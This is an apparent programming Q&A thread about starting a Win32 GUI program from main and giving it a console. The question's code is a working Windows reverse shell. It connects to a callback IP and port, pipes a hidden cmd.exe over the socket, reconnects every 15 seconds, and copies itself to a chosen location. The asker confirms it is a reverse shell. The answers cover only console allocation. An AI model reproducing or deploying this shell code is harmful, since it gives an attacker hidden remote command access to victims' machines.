# Win32 GUI application compiled as GUI need to use a console in C

Tags: c, windows, winapi

I have a program that I am creating that has two sides of it. The main execution (script.exe -setup) will open a console and ask the user multiple questions and then set the answers to variables and make adjustments to the machine based on the answers. This is a simple console application and it works fine if compiled as a Console application.

The second part of the script (script.exe -socket 192.168.1.1:9000) will start a WinMain function that then calls a socket function. The reason I put the socket function inside the WinMain is so it does not display the 'cmd.exe' that CreateProcess calls. It was flashing the command prompt so I got rid of it by using the WinMain. This only works as intended if compiled as a Win32 application, but then I am unable to run the setup side of the script.

I understand that when compiled as a console application it starts with the (int main()) function which is why it works. And when compiled as a Win32 it starts with the (WinMain()) function. However, I just need the application to start at Main as a Win32 Application.

```
int main(int argc, char *argv[]) {
    char filePath[150];
    char fileName[30];
    int portNum;
    char ip[16];
    char socket[23];

    if (argc == 1) {
        printf("Usage: File.exe setup OR File.exe -s IP:PORT");
        exit(0);
    } else if (strcmp(argv[1], "setup") == 0) {
        printf("Doing Setup Stuff\n");
    } else if (strcmp(argv[1], "-socket") == 0){
        strncpy(socket, argv[2], 22);
        WinMain(0,0,socket,0);
        return 0;
    } else {
        printf("Usage: File.exe setup OR File.exe -socket IP:PORT");
        exit(0);
    }

    printf("Desired File Location. Example: C:\\Test\n");
    scanf("%149s", filePath);
    CheckDirectory(filePath);

    printf("\nDesired file name. Example: test.exe\n");
    scanf("%29s", fileName);
    getchar();
    CopyNewFile(filePath, fileName, argv[0]);

    printf("\nEnter callback IP:\n");
    scanf("%15s", ip);

    printf("\nEnter callback port:\n");
    scanf("%5d", &portNum);


    printf("Enter time in seconds for each callback: ");
    scanf("%10d", &secs);

    return 0;
}

int WINAPI WinMain(HINSTANCE hinst, HINSTANCE hprev, LPSTR cmdline, int show) {
    char test[50];
    strncpy(test, cmdline, 49);
    char *ip = strtok(test, ":");
    char *port = strtok(NULL, ":");
    RunSocket(ip, port);
    return 0;
}

void CopyNewFile(char *dir, char *fname, char *curName) {
char fullDir[300];
char file[60];
sprintf(file,"%s", curName);
sprintf(fullDir, "%s\\%s", dir, fname);
if (CopyFile(file, fullDir, FALSE)) {
    printf("\nCopied new file!\n");
} else {
    printf("Did not copy!");
    }
}


void CheckDirectory(char *d) {
DIR* dir = opendir(d);
char answer[2];

if (dir) {
    printf("Directory Exists!\n");
    closedir(dir);
} else if (ENOENT == errno) {
    printf("Directory does not exist. Do you want to create this directory? Y/N: ");
    scanf("%s", answer);
    if (strcmp(answer, "y") == 0) {
        if (CreateDirectory(d, NULL)) {
            printf("Created Directory!\n");
        } else {
            printf("Error Creating Directory!");
            exit(1);
        }
    } else {
        printf("Closing Script!");
        exit(1);
    }
}
}

void RunSocket(char *a, char *b) {

    while(1) {

        WSADATA wsaData;
        SOCKET Winsock;
        struct sockaddr_in hax;
        char ip_addr[16];
        STARTUPINFO ini_processo;
        PROCESS_INFORMATION processo_info;

        WSAStartup(MAKEWORD(2,2), &wsaData);
        Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);

        struct hostent *host;
        host = gethostbyname(a);
        strcpy(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));

        hax.sin_family = AF_INET;
        hax.sin_port = htons(atoi(b));
        hax.sin_addr.s_addr =inet_addr(ip_addr);

        WSAConnect(Winsock,(SOCKADDR*)&hax, sizeof(hax),NULL,NULL,NULL,NULL);

        memset(&ini_processo, 0, sizeof(ini_processo));
        ini_processo.cb=sizeof(ini_processo);
        ini_processo.dwFlags=STARTF_USESTDHANDLES;
        ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;
        CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &ini_processo, &processo_info);
        Sleep(15000);
        }
}
```

Comment: The console is not the same thing as cmd.exe, you can have a console window without cmd.exe. CreateProcess creates a console window only.

Comment: The cmd.exe is opened on the connected-to computer. This is a reverse shell so it connects to me. I will just go to two files since it will be better.

Answer (score 5):

It is either a Windows application and then `WinMain` is the user startup point, or is a console application and then `main` is the user startup point. You can of course call `main` from `WinMain`, or you can allocate a console for the functionality you normally perform from `main`.

The following allocates a console and sets up the standard file handles:

```
#ifndef _WIN32_WINNT
# define _WIN32_WINNT   0x0501
#endif
#include <windows.h>
#include <wincon.h>
#include <stdio.h>

int GetConsole(void)
{
    if (!AttachConsole(ATTACH_PARENT_PROCESS))
        if (!AllocConsole())
            return(0);

    _fileno(stdout)= _fileno(fopen("CON", "w"));
    _fileno(stdin) = _fileno(fopen("CON", "r"));
    _fileno(stderr)= _fileno(fopen("CON", "w"));
    return(1);
}
```

Comment: I tried running this code and it gives me a error: ld returned 1 exit status. Also I have added the code to my script.

Comment: The example is part of a Windows application, not a console application, and mustr be called from (or after) the `WinMain` entry point.

Answer (score 0):

There are only two differences between a CUI and a GUI PE application:

- `CreateProcess` will create a new console window for a CUI application if the parent process does not already have one. This can be suppressed with the `DETACHED_PROCESS` flag.
- Cmd.exe will wait for CUI applications, it will not wait for GUI applications unless you use `start /wait`.

`main` vs `WinMain` is controlled by your development environment, Windows (at the ABI level) just calls the (real) entry point function without any parameters. Your compiler provides the glue between this simple function and `main`/`WinMain`.

You can implement your own `main` from `WinMain` with [`CommandLineToArgvW`](https://msdn.microsoft.com/en-us/library/windows/desktop/bb776391(v=vs.85).aspx) and `WinMain` from `main` with `FreeConsole`+`GetModuleHandle`+`GetCommandLine`+`GetStartupInfo`.

- If a briefly flashing console window killed by `FreeConsole` is unacceptable then you must create a GUI application.
- If you want the application to act as a normal console application with stdin/stdout when started from cmd.exe then you must create a CUI application.

You can try to hack your way to both with a GUI application that calls `AttachConsole`+`AllocConsole` but the result is not perfect because cmd.exe does not wait before printing its next prompt and updating `%errorlevel%`.

To get the best of both worlds the best solution is actually to create two applications, "yourapp.com" and "yourapp.exe". The frontend application would just be a .exe renamed to .com and the server would be a .exe. This works because `%PATHEXT%` has .com before .exe.

Comment: I figured two files were the best options since this seems to be a little strange with what I am trying to do. Thank you.